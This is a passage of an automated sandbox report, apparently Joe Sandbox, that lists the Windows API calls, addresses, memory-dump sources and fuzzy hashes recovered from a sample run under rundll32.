                              • Instruction ID: 4f85e120443b873db51b028adcd61fdff5c01d36b0662f24f513b7c01e2799af
                              • Opcode Fuzzy Hash: 640793cb6a025a27e7128918f7fc80997f84d28241fd7bd6d9d57293b71c33f5
                              • Instruction Fuzzy Hash: E1F044B1901229E78F10EF94D8548EEF778FB45715B00459EED46A7340D634AE15CBE1
                              APIs
                              • EnterCriticalSection.KERNEL32(04DDFB64), ref: 04DB9A3C
                              • GdiplusStartup.GDIPLUS(04DDFB60,?,?), ref: 04DB9A75
                              • LeaveCriticalSection.KERNEL32(04DDFB64), ref: 04DB9A86
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterGdiplusLeaveStartup
                              • String ID:
                              • API String ID: 389129658-0
                              • Opcode ID: 32364f53bbec542dfa46894e0da8eaf05fc9fad271b2d22dc5b4bd6ef4a023e1
                              • Instruction ID: 96379296e4eb6ce866a9b35a0a59e775907476cf2c2a2ab7c439cee83bdfaa60
                              • Opcode Fuzzy Hash: 32364f53bbec542dfa46894e0da8eaf05fc9fad271b2d22dc5b4bd6ef4a023e1
                              • Instruction Fuzzy Hash: CCF0F671982209DFCB009F91E8797EA7BB8FB04301F40018DE54646240C7B62548CFE1
                              APIs
                              • __getptd_noexit.LIBCMT ref: 0420731B
                                • Part of subcall function 042099BA: GetLastError.KERNEL32(?,7FFFFFFF,042072D2,0420AF17,00000010,?,?,?,?,?,?,0420AF67,?,?,AC6D425D,00000000), ref: 042099BE
                                • Part of subcall function 042099BA: ___set_flsgetvalue.LIBCMT ref: 042099CC
                                • Part of subcall function 042099BA: __calloc_crt.LIBCMT ref: 042099E0
                                • Part of subcall function 042099BA: DecodePointer.KERNEL32(00000000,?,?,?,?,?,?,0420AF67,?,?,AC6D425D,00000000,?,0420772F,?,00000000), ref: 042099FA
                                • Part of subcall function 042099BA: GetCurrentThreadId.KERNEL32 ref: 04209A10
                                • Part of subcall function 042099BA: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,0420AF67,?,?,AC6D425D,00000000,?,0420772F,?,00000000), ref: 04209A28
                              • __freeptd.LIBCMT ref: 04207325
                                • Part of subcall function 04209B7C: TlsGetValue.KERNEL32(?,?,0420732A,00000000,?,04207356,00000000), ref: 04209B9D
                                • Part of subcall function 04209B7C: TlsGetValue.KERNEL32(?,?,0420732A,00000000,?,04207356,00000000), ref: 04209BAF
                                • Part of subcall function 04209B7C: DecodePointer.KERNEL32(00000000,?,0420732A,00000000,?,04207356,00000000), ref: 04209BC5
                                • Part of subcall function 04209B7C: __freefls@4.LIBCMT ref: 04209BD0
                                • Part of subcall function 04209B7C: TlsSetValue.KERNEL32(0000001C,00000000,?,0420732A,00000000,?,04207356,00000000), ref: 04209BE2
                              • ExitThread.KERNEL32 ref: 0420732E
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                              • String ID:
                              • API String ID: 4224061863-0
                              • Opcode ID: bb1d523a28579ee5e7d7efc6d0f7160f808ff53c430e52f9fdba2313a097b6af
                              • Instruction ID: 8478592c6d64fe060bf451543bb5cfd9a76ab928474380d7789a00b7749394f2
                              • Opcode Fuzzy Hash: bb1d523a28579ee5e7d7efc6d0f7160f808ff53c430e52f9fdba2313a097b6af
                              • Instruction Fuzzy Hash: B6C08CB02102082AAB003725980C90BBAEDDA90214B848020680A820A3EE68F8818090
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0466022B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                              • Instruction ID: b7805215d0da00f6fa347e7edf0b2dfe7ef76fe2f27cd713c138538182bd8468
                              • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                              • Instruction Fuzzy Hash: BDA13971A00606EFDB24CFA9C880AAEB7B5FF48705B148179E416EB751E770FA51CB90
                              APIs
                              • timeGetTime.WINMM(04DB30C5,?,?), ref: 04DB3413
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Timetime
                              • String ID:
                              • API String ID: 17336451-0
                              • Opcode ID: a005c9cf2c78d8066fef6d6b724b0ce714012d0df4fa92b3b93f1e98242db0ef
                              • Instruction ID: 5eb83add61afb5c64ff02843a93412312413103bfc466cd3c257c158381b9bc6
                              • Opcode Fuzzy Hash: a005c9cf2c78d8066fef6d6b724b0ce714012d0df4fa92b3b93f1e98242db0ef
                              • Instruction Fuzzy Hash: 5551AD72700605EFD711DEA9C8D09AAB7A9FF84254714826CED9B8B705EB31FC419BE0
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLastsend
                              • String ID:
                              • API String ID: 1802528911-0
                              • Opcode ID: 18f7d03278f3b69eeb5389b041fe32cbc1f4be5d6f365821946593192b849ae5
                              • Instruction ID: 1463815e378ab537688f14b80c84fb35e6adaa52a6ae2301b4730a9232ec4693
                              • Opcode Fuzzy Hash: 18f7d03278f3b69eeb5389b041fe32cbc1f4be5d6f365821946593192b849ae5
                              • Instruction Fuzzy Hash: 4B5179715593409FC701DF19C480A4AFBF1FF89328F548A1EE5A88B791E330D969CB5A
                              APIs
                              • GetQueuedCompletionStatusEx.KERNEL32(?,?,?,?,-00000001,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CBF5AB6
                              • GetLastError.KERNEL32(?,-00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,6CC58A83,?), ref: 6CBF5AD1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: CompletionErrorLastQueuedStatus
                              • String ID:
                              • API String ID: 1532515109-0
                              • Opcode ID: 4251df5963eb5df988e45d63c338e0a1d39b7a8a54c15b4c9e3f1486f2c78cba
                              • Instruction ID: 3be160b992f5bd07fc0acaed33a9d6f52d72555a24886903937150a99bb6a8cd
                              • Opcode Fuzzy Hash: 4251df5963eb5df988e45d63c338e0a1d39b7a8a54c15b4c9e3f1486f2c78cba
                              • Instruction Fuzzy Hash: 9231C3313083448BC304DA6ADCC472AB7E6EBC8398F14C93DE4AAC7750E6349C1E8B15
                              APIs
                                • Part of subcall function 6CC50110: RtlAllocateHeap.NTDLL(02870000,00000000,?,?,6CBC5AAF,?,00000004,6CBCE4B2,?,6CC4682F,?,?,?,?,6CC465EB,00000002), ref: 6CC5011F
                              • CreateThread.KERNEL32(00000000,?,6CC4FBE0,00000000,00010000,00000000), ref: 6CC4FAF8
                              • GetLastError.KERNEL32(?,?,?), ref: 6CC4FB54
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AllocateCreateErrorHeapLastThread
                              • String ID:
                              • API String ID: 3346699961-0
                              • Opcode ID: 45c1f6bce9847093b77b6d5ea75d2bd8809f98ab18317800c0fcc8765271c4ed
                              • Instruction ID: b93b6e4cde7d68c29eb4b7a67e18b481f53a137ecd4c72f11dd308de75d9df00
                              • Opcode Fuzzy Hash: 45c1f6bce9847093b77b6d5ea75d2bd8809f98ab18317800c0fcc8765271c4ed
                              • Instruction Fuzzy Hash: 4F3192B0A002498FDB00DF69C980BEEBBF5FF49314F14C165E518AB740E7749945CBA5
                              APIs
                              • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 04203023
                              • recv.WS2_32(?,?,00040000,00000000), ref: 04203044
                                • Part of subcall function 042072CD: __getptd_noexit.LIBCMT ref: 042072CD
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: __getptd_noexitrecvselect
                              • String ID:
                              • API String ID: 4248608111-0
                              • Opcode ID: d7ba393c48ca7c0c17cb92714509ae21bec28ab181c20c2315807c4a92a367f8
                              • Instruction ID: 561ba0c2844ab5390790bc0ab0012fc048858727d34e10ac4c5522193a7017af
                              • Opcode Fuzzy Hash: d7ba393c48ca7c0c17cb92714509ae21bec28ab181c20c2315807c4a92a367f8
                              • Instruction Fuzzy Hash: AE21E770711208AFEB20EF28DC88B9A77F5EF55314F1081A5E9045B1D2DBB1BD84CBA1
                              APIs
                              • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 04DB3043
                              • recv.WS2_32(?,?,00040000,00000000), ref: 04DB3064
                                • Part of subcall function 04DBF87B: __getptd_noexit.LIBCMT ref: 04DBF87B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: __getptd_noexitrecvselect
                              • String ID:
                              • API String ID: 4248608111-0
                              • Opcode ID: c6a1208dc7ec4fa29f234feeee696e1cba19e680a688a5c3828c72a06adedaa3
                              • Instruction ID: 9f62a034fe6524d730575477c34f489d1fee031b0ff6237e67c417b06a340865
                              • Opcode Fuzzy Hash: c6a1208dc7ec4fa29f234feeee696e1cba19e680a688a5c3828c72a06adedaa3
                              • Instruction Fuzzy Hash: 39218270700614DBEB209F69CC88BDA77A4FF04314F1046A9E996AB290DA70F984DBE1
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6CC4FD60
                              • SetThreadDescription.KERNELBASE(00000000,?), ref: 6CC4FD6E
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: Thread$CurrentDescription
                              • String ID:
                              • API String ID: 654298328-0
                              • Opcode ID: 86d14fb26028056208929d8e58ee642459df53758fc149f0b68994887e9d24c8
                              • Instruction ID: d09b45d5edb185df64f80c04dc97b4f9a0086fb34301039bea96c856ae98c671
                              • Opcode Fuzzy Hash: 86d14fb26028056208929d8e58ee642459df53758fc149f0b68994887e9d24c8
                              • Instruction Fuzzy Hash: 88219AB1E006498FCB00DF98C844BEEBBB5FF48324F148169E816A7B50E734AD05CBA0
                              APIs
                              • memset.VCRUNTIME140(?,00000000,00000190), ref: 6CC4F9DA
                              • WSAStartup.WS2_32(00000202,?), ref: 6CC4F9E8
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: Startupmemset
                              • String ID:
                              • API String ID: 1873301828-0
                              • Opcode ID: 08f7047711626e60d572b6bb434ea6f1ec3dae585dd348a3d64f289bf1aa2dd1
                              • Instruction ID: 6731c9ee222dfabbe0f837652b5dc469e54ec5c8b5b789425a3b334c595b59b6
                              • Opcode Fuzzy Hash: 08f7047711626e60d572b6bb434ea6f1ec3dae585dd348a3d64f289bf1aa2dd1
                              • Instruction Fuzzy Hash: BD11C671A4030C9FD700DF9AD945BDE77B8AF86719F00C054FD499BB41E730A9488AA2
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000140), ref: 6CBF9ECC
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: main
                              • API String ID: 2162964266-3207122276
                              • Opcode ID: 4a7be579364f8dec4ffc7060f23a4a8848361e86b575683bebca7c7b54ad4cff
                              • Instruction ID: 4078746958c7d4e15b81b9079df12612d46be78cfab4ad5ff075a165b6e1f1a7
                              • Opcode Fuzzy Hash: 4a7be579364f8dec4ffc7060f23a4a8848361e86b575683bebca7c7b54ad4cff
                              • Instruction Fuzzy Hash: 3F11B731B006019BEB11DF25D480BAE73A9EF84728F144564D8298BB94DF34FC19CBE2
                              APIs
                              • send.WS2_32(?,?,00040000,00000000), ref: 04DB3291
                              • send.WS2_32(?,?,?,00000000), ref: 04DB32CE
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: send
                              • String ID:
                              • API String ID: 2809346765-0
                              • Opcode ID: cf55f44120b5dd4ea97d749d49d7da3061a809a0acff67fda56b8c386c8a9970
                              • Instruction ID: 8be168ea0c693c6a29d5d91ee8dc4f38273c4ffa6cec73defe39112ec12ef1a5
                              • Opcode Fuzzy Hash: cf55f44120b5dd4ea97d749d49d7da3061a809a0acff67fda56b8c386c8a9970
                              • Instruction Fuzzy Hash: 6811A572B05304FBD7608A6EDD89B9E7798FB81364F104165ED4AD7280D270FD41A7A4
                              APIs
                              • send.WS2_32(?,?,00040000,00000000), ref: 04203271
                              • send.WS2_32(?,?,?,00000000), ref: 042032AE
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: send
                              • String ID:
                              • API String ID: 2809346765-0
                              • Opcode ID: 45a8c446b9c07855006ead014f17d836b8a8989f3c0f06e96404944b6d732096
                              • Instruction ID: 8ed768c850c2887deeee5090e7dda745b6f1df89654c35640356af67eacc0228
                              • Opcode Fuzzy Hash: 45a8c446b9c07855006ead014f17d836b8a8989f3c0f06e96404944b6d732096
                              • Instruction Fuzzy Hash: 0411C272B25305AFD720CA2EDC88B5A77D8EB81368F118122EE0CD71C2DA70BC419650
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: SleepTimetime
                              • String ID:
                              • API String ID: 346578373-0
                              • Opcode ID: e0c31e1aa7028ad21a61f149e8c59b07164c3fffb5f1d0b0b3ceb42f93f30392
                              • Instruction ID: 274b4941d21f4d724ea08b4db282e7429908e07dcb8c2f203dde7e1d344544b0
                              • Opcode Fuzzy Hash: e0c31e1aa7028ad21a61f149e8c59b07164c3fffb5f1d0b0b3ceb42f93f30392
                              • Instruction Fuzzy Hash: CA01BC31200206EFD311CF28C8C8BA9B7A9FB99741F144268E9458B280C735B9C6DBE1
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: SleepTimetime
                              • String ID:
                              • API String ID: 346578373-0
                              • Opcode ID: f5e0866dda216894495eef4a4691855038d3b84e5863760eca280ba79c353da4
                              • Instruction ID: 4b3ecabccc481304a5c66392456470c95523b46ab7bfe6059ede266d15ed49a8
                              • Opcode Fuzzy Hash: f5e0866dda216894495eef4a4691855038d3b84e5863760eca280ba79c353da4
                              • Instruction Fuzzy Hash: 8B015E31710206AFD710DF59D8C8BA9B3E9FB99311F148268D904871D1C775B9D5CBD1
                              APIs
                              • HeapCreate.KERNEL32(00000004,00000000,00000000,04DBDFAE,00000000,04DB9760,?,?,?,00000000,04DD125B,000000FF,?,04DBDFAE), ref: 04DBCC9B
                              • _free.LIBCMT ref: 04DBCCD6
                                • Part of subcall function 04DB1280: __CxxThrowException@8.LIBCMT ref: 04DB1290
                                • Part of subcall function 04DB1280: DeleteCriticalSection.KERNEL32(00000000,04DBD341,04DD6624,?,?,04DBD341,?,?,?,?,04DD5A40,00000000), ref: 04DB12A1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                              • String ID:
                              • API String ID: 1116298128-0
                              • Opcode ID: 6ee81ae3efcca11f6b1e5200d6ded3f9489654c4eeb7c8857f4b5040e8a207da
                              • Instruction ID: ab5fa453b00facf51bc62e79e4037ae4fb39be7df283341c862e97014007fddf
                              • Opcode Fuzzy Hash: 6ee81ae3efcca11f6b1e5200d6ded3f9489654c4eeb7c8857f4b5040e8a207da
                              • Instruction Fuzzy Hash: 27017AF0A01B408FD3218F6A9844A47FAF8FF99700B104A1EE2DAC7B10D374A505CBA5
                              APIs
                              • HeapCreate.KERNEL32(00000004,00000000,00000000,042061A0,00000000,04205B02), ref: 042065EB
                              • _free.LIBCMT ref: 04206626
                                • Part of subcall function 04201280: __CxxThrowException@8.LIBCMT ref: 04201290
                                • Part of subcall function 04201280: DeleteCriticalSection.KERNEL32(00000000,FFFFFFFF,04217E78,?,?,04206601), ref: 042012A1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                              • String ID:
                              • API String ID: 1116298128-0
                              • Opcode ID: d7cf103d7294eddc69ac49c480690c4548f4c8b1058599e43f0980d9ea10815b
                              • Instruction ID: c602f7c17756168cab5bc6abf255dab7058a5cb55426dd706663bc7f9e1229de
                              • Opcode Fuzzy Hash: d7cf103d7294eddc69ac49c480690c4548f4c8b1058599e43f0980d9ea10815b
                              • Instruction Fuzzy Hash: B501C0F0A00B408FD3308F6A9844A17FAF8FFA8710B108A1EE2DAC7A50D775A144CF95
                              APIs
                              • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 6CC584BE
                              • WSAGetLastError.WS2_32(?,00000004,?,?,00000002,6CC0288D,?,?,6CCB5F8C,6CCB5F64), ref: 6CC584CB
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLastsetsockopt
                              • String ID:
                              • API String ID: 1729277954-0
                              • Opcode ID: 3d801aa72a588a020bbcfd5a358193338fd0cca70957b88a9a54671afe4244ba
                              • Instruction ID: a39264a91fca7ac6207511cac35b7281761c331b220d58eacfc6f07e94ee5143
                              • Opcode Fuzzy Hash: 3d801aa72a588a020bbcfd5a358193338fd0cca70957b88a9a54671afe4244ba
                              • Instruction Fuzzy Hash: 14F055B0604B405FE7244F38885ABA77BF49B06324F04882EF6A7C73C0C77598148361
                              APIs
                              • CreateThread.KERNEL32(00000000,00000000,04DBDE70,00000000,00000000,00000000), ref: 04DBE3FB
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,04DC10C8,?,?,?,?,?,?,04DD6298,0000000C,04DC1170,?), ref: 04DBE409
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CreateObjectSingleThreadWait
                              • String ID:
                              • API String ID: 1891408510-0
                              • Opcode ID: e1023e295dd5d6698802dbbf1e8e2655b6736f6e25dc645791e46578c706dbe7
                              • Instruction ID: 785dfa19e6c1690e355bee676dd5715f8eb29b6c40baf41ea3d3758091b61420
                              • Opcode Fuzzy Hash: e1023e295dd5d6698802dbbf1e8e2655b6736f6e25dc645791e46578c706dbe7
                              • Instruction Fuzzy Hash: 70E012B0644205FFDB109FA4AC99DB637ECE7143107104275B951C7341D538BC808AA0
                              APIs
                              • __getptd.LIBCMT ref: 04DBF8EF
                                • Part of subcall function 04DC3E41: __getptd_noexit.LIBCMT ref: 04DC3E44
                                • Part of subcall function 04DC3E41: __amsg_exit.LIBCMT ref: 04DC3E51
                                • Part of subcall function 04DBF8C4: __getptd_noexit.LIBCMT ref: 04DBF8C9
                                • Part of subcall function 04DBF8C4: __freeptd.LIBCMT ref: 04DBF8D3
                                • Part of subcall function 04DBF8C4: ExitThread.KERNEL32 ref: 04DBF8DC
                              • __XcptFilter.LIBCMT ref: 04DBF910
                                • Part of subcall function 04DC4173: __getptd_noexit.LIBCMT ref: 04DC4179
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                              • String ID:
                              • API String ID: 418257734-0
                              • Opcode ID: 19da20c6bb210dd3d35fa9447ca57d693e5a33e7b44c8e4f9ab9aec8ff067b4e
                              • Instruction ID: c56030ac2d789f44389e05f9b89402cab629422e8a80abda44928a899a1b12c2
                              • Opcode Fuzzy Hash: 19da20c6bb210dd3d35fa9447ca57d693e5a33e7b44c8e4f9ab9aec8ff067b4e
                              • Instruction Fuzzy Hash: 3FE0ECB5A00605DFEB08EBA0C815E6E7779EF45705F20414DE1425B2A0CB79B944DF74
                              APIs
                              • __getptd.LIBCMT ref: 04207341
                                • Part of subcall function 04209A33: __getptd_noexit.LIBCMT ref: 04209A36
                                • Part of subcall function 04209A33: __amsg_exit.LIBCMT ref: 04209A43
                                • Part of subcall function 04207316: __getptd_noexit.LIBCMT ref: 0420731B
                                • Part of subcall function 04207316: __freeptd.LIBCMT ref: 04207325
                                • Part of subcall function 04207316: ExitThread.KERNEL32 ref: 0420732E
                              • __XcptFilter.LIBCMT ref: 04207362
                                • Part of subcall function 04209D65: __getptd_noexit.LIBCMT ref: 04209D6B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                              • String ID:
                              • API String ID: 418257734-0
                              • Opcode ID: 96f678a688c6dd940e805ba4694edda86fd21797305177ab4e891c78768e2bac
                              • Instruction ID: 52845efec21e39fa88c10599bc66ad284d2ba12aab3592e3511f441c28bad32d
                              • Opcode Fuzzy Hash: 96f678a688c6dd940e805ba4694edda86fd21797305177ab4e891c78768e2bac
                              • Instruction Fuzzy Hash: E8E0ECB1A606009FFB18BBA0C945E2E77B5AF84605F208099E1035B2E2CF75BD80DA20
                              APIs
                              • __lock.LIBCMT ref: 04DC648E
